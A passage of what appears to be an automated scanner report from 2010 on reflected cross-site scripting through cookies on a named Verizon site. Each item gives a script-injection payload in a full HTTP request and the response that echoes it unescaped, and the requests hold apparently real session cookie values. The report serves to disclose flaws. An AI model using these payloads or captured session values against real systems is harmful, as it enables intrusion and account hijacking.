CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 03:14:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5b82d'><script>alert(1)</script>f8ced5a7994; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5B82D'><SCRIPT>ALERT(1)</SCRIPT>F8CED5A7994 ' />
...[SNIP]...

3.183. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4abd8<script>alert(1)</script>d0d4bb3410c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4abd8<script>alert(1)</script>d0d4bb3410c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 03:14:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4abd8<script>alert(1)</script>d0d4bb3410c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4ABD8<SCRIPT>ALERT(1)</SCRIPT>D0D4BB3410C </DIV>
...[SNIP]...

3.184. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 00:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FFF9'><SCRIPT>ALERT(1)</SCRIPT>5F319F2B2D3 ' />
...[SNIP]...

3.185. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 306e5<script>alert(1)</script>de57f988df3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX306e5<script>alert(1)</script>de57f988df3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 00:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX306e5<script>alert(1)</script>de57f988df3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX306E5<SCRIPT>ALERT(1)</SCRIPT>DE57F988DF3 </DIV>
...[SNIP]...

3.186. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65b09'><script>alert(1)</script>cb2218c31f2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX65b09'><script>alert(1)</script>cb2218c31f2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64444
Expires: Sat, 20 Nov 2010 03:13:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX65b09'><script>alert(1)</script>cb2218c31f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX65B09'><SCRIPT>ALERT(1)</SCRIPT>CB2218C31F2 ' />
...[SNIP]...

3.187. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1d1'><script>alert(1)</script>6e680d13017 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXbd1d1'><script>alert(1)</script>6e680d13017; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62999
Expires: Sat, 20 Nov 2010 03:14:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbd1d1'><script>alert(1)</script>6e680d13017; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBD1D1'><SCRIPT>ALERT(1)</SCRIPT>6E680D13017 ' />
...[SNIP]...

3.188. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
